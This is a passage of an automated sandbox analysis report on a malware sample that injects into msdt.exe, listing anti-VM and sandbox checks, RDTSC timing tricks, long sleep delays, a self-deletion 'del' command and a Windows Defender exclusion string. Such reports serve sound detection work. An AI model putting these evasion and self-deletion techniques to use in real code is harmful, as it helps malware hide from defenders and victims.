          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00459347 push ds; ret 1_2_0045934C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00459361 push ds; retf 1_2_00459364
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00456F9A push 00000018h; retf 1_2_0045715A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0110D0D1 push ecx; ret 1_2_0110D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CFD0D1 push ecx; ret 18_2_04CFD0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB89C push eax; ret 18_2_008EB8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB83B push eax; ret 18_2_008EB8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB832 push eax; ret 18_2_008EB838
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008E533E push esp; ret 18_2_008E533F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_008EB7E5 push eax; ret 18_2_008EB838
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85954100497

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.S9yf6BkjhTQUbHE.exe.2fe8e70.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.S9yf6BkjhTQUbHE.exe.307aecc.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: S9yf6BkjhTQUbHE.exe PID: 6344, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000008D8614 second address: 00000000008D861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000008D89AE second address: 00000000008D89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239859s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6392Thread sleep count: 1268 > 30
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6392Thread sleep count: 928 > 30
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239732s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6348Thread sleep time: -30583s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239623s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239512s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239405s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239281s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239170s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -239046s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238903s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238765s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238656s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238531s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238421s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238311s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -238203s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -237906s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -237312s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -237109s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -236546s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -236435s >= -30000s
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6376Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7104Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239859
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239732
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239623
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239512
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239405
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239281
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239170
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239046
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238903
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238765
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238656
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238531
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238421
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238311
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238203
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237906
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237312
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237109
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 236546
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 236435
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeWindow / User API: threadDelayed 1268
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeWindow / User API: threadDelayed 928
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 30583
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.265082760.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.274001743.00000000011B3000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.296079980.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: msdt.exe, 00000012.00000002.519572932.000000000318D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW1mYI
          Source: msdt.exe, 00000012.00000002.519548832.0000000003182000.00000004.00000020.sdmp, msdt.exe, 00000012.00000002.519325977.000000000313F000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.254354478.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.265145193.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.257571644.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.265145193.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe Code function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe Code function: 1_2_010B9100 mov eax, dword ptr fs:[00000030h] 1_2_010B9100
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01180EA5 mov eax, dword ptr fs:[00000030h]1_2_01180EA5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01180EA5 mov eax, dword ptr fs:[00000030h]1_2_01180EA5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EFAB0 mov eax, dword ptr fs:[00000030h]1_2_010EFAB0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E36CC mov eax, dword ptr fs:[00000030h]1_2_010E36CC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2ACB mov eax, dword ptr fs:[00000030h]1_2_010E2ACB
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F8EC7 mov eax, dword ptr fs:[00000030h]1_2_010F8EC7
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01188ED6 mov eax, dword ptr fs:[00000030h]1_2_01188ED6
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0116FEC0 mov eax, dword ptr fs:[00000030h]1_2_0116FEC0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2AE4 mov eax, dword ptr fs:[00000030h]1_2_010E2AE4
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E16E0 mov ecx, dword ptr fs:[00000030h]1_2_010E16E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C76E2 mov eax, dword ptr fs:[00000030h]1_2_010C76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78CD6 mov eax, dword ptr fs:[00000030h]18_2_04D78CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26CF0 mov eax, dword ptr fs:[00000030h]18_2_04D26CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26CF0 mov eax, dword ptr fs:[00000030h]18_2_04D26CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26CF0 mov eax, dword ptr fs:[00000030h]18_2_04D26CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D614FB mov eax, dword ptr fs:[00000030h]18_2_04D614FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB849B mov eax, dword ptr fs:[00000030h]18_2_04CB849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C450 mov eax, dword ptr fs:[00000030h]18_2_04D3C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C450 mov eax, dword ptr fs:[00000030h]18_2_04D3C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA44B mov eax, dword ptr fs:[00000030h]18_2_04CDA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC746D mov eax, dword ptr fs:[00000030h]18_2_04CC746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61C06 mov eax, dword ptr fs:[00000030h]18_2_04D61C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26C0A mov eax, dword ptr fs:[00000030h]18_2_04D26C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7740D mov eax, dword ptr fs:[00000030h]18_2_04D7740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7740D mov eax, dword ptr fs:[00000030h]18_2_04D7740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7740D mov eax, dword ptr fs:[00000030h]18_2_04D7740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDBC2C mov eax, dword ptr fs:[00000030h]18_2_04CDBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov ecx, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D26DC9 mov eax, dword ptr fs:[00000030h]18_2_04D26DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D58DF1 mov eax, dword ptr fs:[00000030h]18_2_04D58DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]18_2_04CBD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]18_2_04CBD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FDE2 mov eax, dword ptr fs:[00000030h]18_2_04D6FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA2D8A mov eax, dword ptr fs:[00000030h]18_2_04CA2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2581 mov eax, dword ptr fs:[00000030h]18_2_04CD2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDFD9B mov eax, dword ptr fs:[00000030h]18_2_04CDFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDFD9B mov eax, dword ptr fs:[00000030h]18_2_04CDFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD35A1 mov eax, dword ptr fs:[00000030h]18_2_04CD35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]18_2_04CD1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]18_2_04CD1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]18_2_04CD1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D705AC mov eax, dword ptr fs:[00000030h]18_2_04D705AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D705AC mov eax, dword ptr fs:[00000030h]18_2_04D705AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE3D43 mov eax, dword ptr fs:[00000030h]18_2_04CE3D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D23540 mov eax, dword ptr fs:[00000030h]18_2_04D23540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D53D40 mov eax, dword ptr fs:[00000030h]18_2_04D53D40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC7D50 mov eax, dword ptr fs:[00000030h]18_2_04CC7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCC577 mov eax, dword ptr fs:[00000030h]18_2_04CCC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCC577 mov eax, dword ptr fs:[00000030h]18_2_04CCC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78D34 mov eax, dword ptr fs:[00000030h]18_2_04D78D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D2A537 mov eax, dword ptr fs:[00000030h]18_2_04D2A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6E539 mov eax, dword ptr fs:[00000030h]18_2_04D6E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD4D3B mov eax, dword ptr fs:[00000030h]18_2_04CD4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD4D3B mov eax, dword ptr fs:[00000030h]18_2_04CD4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD4D3B mov eax, dword ptr fs:[00000030h]18_2_04CD4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAAD30 mov eax, dword ptr fs:[00000030h]18_2_04CAAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78ED6 mov eax, dword ptr fs:[00000030h]18_2_04D78ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD36CC mov eax, dword ptr fs:[00000030h]18_2_04CD36CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE8EC7 mov eax, dword ptr fs:[00000030h]18_2_04CE8EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5FEC0 mov eax, dword ptr fs:[00000030h]18_2_04D5FEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB76E2 mov eax, dword ptr fs:[00000030h]18_2_04CB76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD16E0 mov ecx, dword ptr fs:[00000030h]18_2_04CD16E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3FE87 mov eax, dword ptr fs:[00000030h]18_2_04D3FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D70EA5 mov eax, dword ptr fs:[00000030h]18_2_04D70EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D70EA5 mov eax, dword ptr fs:[00000030h]18_2_04D70EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D70EA5 mov eax, dword ptr fs:[00000030h]18_2_04D70EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D246A7 mov eax, dword ptr fs:[00000030h]18_2_04D246A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
